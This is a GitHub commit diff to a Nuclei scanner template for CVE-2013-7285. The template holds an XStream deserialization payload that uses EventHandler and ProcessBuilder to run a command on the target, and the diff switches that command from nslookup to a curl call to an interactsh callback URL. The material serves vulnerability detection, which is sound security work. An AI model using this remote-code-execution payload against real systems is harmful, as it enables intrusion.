Update CVE-2013-7285.yaml

patch-1
我会啊D,明小子,御剑 2023-03-22 17:51:20 +08:00 committed by GitHub
parent 64bb27afcb
commit 7a6459039a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 2 deletions

View File

@ -21,7 +21,7 @@ requests:
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>nslookup {{interactsh-url}}</string>
<string>curl {{interactsh-url}} -H 'User-Agent: nuclei'</string>
</command>
</target>
<action>start</action>
@ -33,4 +33,9 @@ requests:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: nuclei"